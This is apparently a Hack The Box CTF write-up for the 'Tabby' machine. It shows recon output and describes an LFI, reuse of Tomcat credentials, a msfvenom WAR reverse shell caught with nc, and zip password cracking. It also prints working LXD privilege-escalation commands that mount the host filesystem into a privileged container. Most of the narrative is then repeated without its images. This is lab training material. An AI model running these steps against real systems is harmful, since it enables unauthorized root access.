title: "HTB - TABBY"
author: mayomacam
date: "2020-07-03"
subject: "CTF Writeup"
keywords: HACKTHEBOX, tabby, CTF, Security

box

Tabby is simple old style box. It’s all arround curl and tomcat9. Just understand the working of tomcat9.

Information Gathering

Nmap

We begin our reconnaissance by running an Nmap scan checking default scripts and testing for vulnerabilities.

sudo update-alternatives --config java
┌─[[email protected]]─[~]
└──╼ $sudo nmap -p- --min-rate 10000 -Pn 10.10.10.194
[sudo] password for mayomacam: 
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-25 16:35 IST
Nmap scan report for 10.10.10.194
Host is up (0.20s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8080/tcp open  http-proxy

Nmap done: 1 IP address (1 host up) scanned in 11.99 seconds
┌─[[email protected]]─[~]
└──╼ $sudo nmap -sC -sV -sT -p22,80,8080 -Pn 10.10.10.194
[sudo] password for mayomacam: 
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-25 16:55 IST
Nmap scan report for 10.10.10.194
Host is up (0.21s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Mega Hosting
8080/tcp open  http    Apache Tomcat
|_http-title: Apache Tomcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.55 seconds
┌─[[email protected]]─[~]
└──╼ $

From the above output we can see that ports 22, 80, and 8080 are the open ports.

Run wfuzz on website for directories.

┌─[[email protected]]─[~]
└──╼ $wfuzz -c -w /usr/share/wordlists/dirb/big.txt -z list,txt-php-html -u http://10.10.10.194/FUZZ.FUZ2Z --hc 404,403 -t 100

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.194/FUZZ.FUZ2Z
Total requests: 61407

===================================================================
ID           Response   Lines    Word     Chars       Payload        
===================================================================

000003043:   200        35 L     237 W    1574 Ch     "Readme - txt" 
000028688:   200        373 L    938 W    14175 Ch    "index - php"  
000037628:   200        0 L      0 W      0 Ch        "news - php"   

Total time: 199.8666
Processed Requests: 61407
Filtered Requests: 61404
Requests/sec.: 307.2398

┌─[[email protected]]─[~]
└──╼ $wfuzz -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hc 404,403 -u "http://10.10.10.194/files/FUZZ" -t 100

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.194/files/FUZZ
Total requests: 220560

===================================================================
ID           Response   Lines    Word     Chars       Payload        
===================================================================

000000063:   301        9 L      28 W     320 Ch      "archive"      
000003473:   200        150 L    375 W    6507 Ch     "statement"    

Total time: 616.8924
Processed Requests: 220560
Filtered Requests: 220558
Requests/sec.: 357.5339

run gobuster with apache default directories.

┌─[[email protected]]─[~/hackthebox/tobby]
└──╼ $gobuster dir -u http://10.10.10.194:8080/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/ApacheTomcat.fuzz.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.194:8080/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/SecLists/Discovery/Web-Content/ApacheTomcat.fuzz.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/06/26 08:12:42 Starting gobuster
===============================================================
//examples/jsp/index.html (Status: 200)
//examples (Status: 302)
//examples/jsp/snp/snoop.jsp (Status: 200)
//examples/servlets/index.html (Status: 200)
//manager (Status: 302)
//manager/html/ (Status: 401)
//manager/jmxproxy (Status: 401)
//manager/html (Status: 401)
//manager/status (Status: 401)
//manager/text (Status: 401)
===============================================================
2020/06/26 08:12:43 Finished
===============================================================

FOOTHOLD

First let’s check the website.

website

There are one more webpage. News.php.

website

when we inspect element we got nothing . So in link file parameter can be use for lfi. we try lfi maybe we can get some info. And on our first try we can get etc/passwd file.

lfi

let’s leave it here and check our others port to see what we got here more.

8080

It’s apache tomcat9. I can’t seems to find to find lfi what we have present on website. So i install apache tomcat9 on my system to check files which can be access by anyone on system.

tomcat9

while searching for creds i got some interesting files.

logrotate

/var/lib/tomcat9/conf/ folder work. Ans we got our first creds .

tomcat9

Exploitation

using creds login into host-manager.

tomcat9

as we can see we don’t have permission of admin-script so all left is manager-script role permissions. So on google i find this.

github

so i create a war file using msfvenom.

msfvenom

and upload it on server. On github link upload command dosen’t work for me. Because we are not admin-script. So i use what we have given of tomcat7 data.

upload

Now i ahve to open a nc on my computer and go to upload war file directory.

http://10.10.10.194:8080/shell.war

we got our shell as tomcat.

tomcat

User Flag

First i have to change shell to proper working shell. Primary python interactive shell doesn’t work. Then i remember we don’t have python2 anymore as primary python so i update command and it works we have shell.

python-shell

python3-shell

we can’t use nano and clear commandsbecause of term environment variable not set. So i have to set it to.

export TERM=ansi

we got our proper working shell.

Now to user. First i run linpeas on machine. Some data from linpeas.

linpeas

system details

linpeas

users

linpeas

user-with permissions

linpeas

all shells we can use or spawn.

linpeas

Now let’s go to home directories /opt/tomcat9. And check files.

tomcat

Nothing found. So i remember many webserver make backup theirs files. That can only done by admins. As we see user-permissions ash have adm permissions. So i check /var/www/html/ folder. Where i find a backup with password protected.

backup

So i download files from box in files folder. When i open backup file it require password. This is can be quite useful on boxes. So i ran fcrackzip on backup file.

zip

Found password for backup files. So file belong to user ash. On boxes password may belong to someone. So i su ash and now i am ash. And read ash user.txt .

ash

Root Flag

I again linpeas as user ash but didn’t got anything. So while fcrackzip is cracking password i search whole system files. And found cloud.cfg. Online search i got we can run applications in containers it’s more like docker but for applications.

https://www.hackingarticles.in/lxd-privilege-escalation/

Here i got all root related idea. So i try exploit.

git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine

And it takes some time but gonna give alpine-v3.12-x86_64-20200703_0717.tar.gz file. Then i upload it on box.

alpine

Now i run …

lxc image import ./apline-v3.10-x86_64-20200703_0717.tar.gz --alias hell
lxc image list

I see some other people applications are running too. And others command give error beacuse others are already running . Otherwise other commands works perfectly.

lxc init hell ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh

alpine

id and we are root user in container and we don’t need passwd for root access. All left is to go in /mnt/root/root/ (because /mnt/root where our root directory is in container so we have to go root folder for root.txt) and read root.txt

root

Tabby is simple old style box. It’s all arround curl and tomcat9. Just understand the working of tomcat9.

Information Gathering

Nmap

We begin our reconnaissance by running an Nmap scan checking default scripts and testing for vulnerabilities.

From the above output we can see that ports 22, 80, and 8080 are the open ports.

Run wfuzz on website for directories.

run gobuster with apache default directories.

FOOTHOLD

First let’s check the website.

There are one more webpage. News.php.

when we inspect element we got nothing . So in link file parameter can be use for lfi. we try lfi maybe we can get some info. And on our first try we can get etc/passwd file.

let’s leave it here and check our others port to see what we got here more.

It’s apache tomcat9. I can’t seems to find to find lfi what we have present on website. So i install apache tomcat9 on my system to check files which can be access by anyone on system.

while searching for creds i got some interesting files.

/var/lib/tomcat9/conf/ folder work. Ans we got our first creds .

Exploitation

using creds login into host-manager.

as we can see we don’t have permission of admin-script so all left is manager-script role permissions. So on google i find this.

so i create a war file using msfvenom.

and upload it on server. On github link upload command dosen’t work for me. Because we are not admin-script. So i use what we have given of tomcat7 data.

Now i ahve to open a nc on my computer and go to upload war file directory.

we got our shell as tomcat.

User Flag

First i have to change shell to proper working shell. Primary python interactive shell doesn’t work. Then i remember we don’t have python2 anymore as primary python so i update command and it works we have shell.

we can’t use nano and clear commandsbecause of term environment variable not set. So i have to set it to.

we got our proper working shell.

Now to user. First i run linpeas on machine. Some data from linpeas.

system details

users

user-with permissions

all shells we can use or spawn.

Now let’s go to home directories /opt/tomcat9. And check files.

Nothing found. So i remember many webserver make backup theirs files. That can only done by admins. As we see user-permissions ash have adm permissions. So i check /var/www/html/ folder. Where i find a backup with password protected.

So i download files from box in files folder. When i open backup file it require password. This is can be quite useful on boxes. So i ran fcrackzip on backup file.

Found password for backup files. So file belong to user ash. On boxes password may belong to someone. So i su ash and now i am ash. And read ash user.txt .

Root Flag

I again linpeas as user ash but didn’t got anything. So while fcrackzip is cracking password i search whole system files. And found cloud.cfg. Online search i got we can run applications in containers it’s more like docker but for applications.

Here i got all root related idea. So i try exploit.

And it takes some time but gonna give alpine-v3.12-x86_64-20200703_0717.tar.gz file. Then i upload it on box.

Now i run …

I see some other people applications are running too. And others command give error beacuse others are already running . Otherwise other commands works perfectly.

id and we are root user in container and we don’t need passwd for root access. All left is to go in /mnt/root/root/ (because /mnt/root where our root directory is in container so we have to go root folder for root.txt) and read root.txt

Conclusion

It’s a beginner friendly so it’s simple , here understanding tomcat9 working is main. I enjoy a lot this box.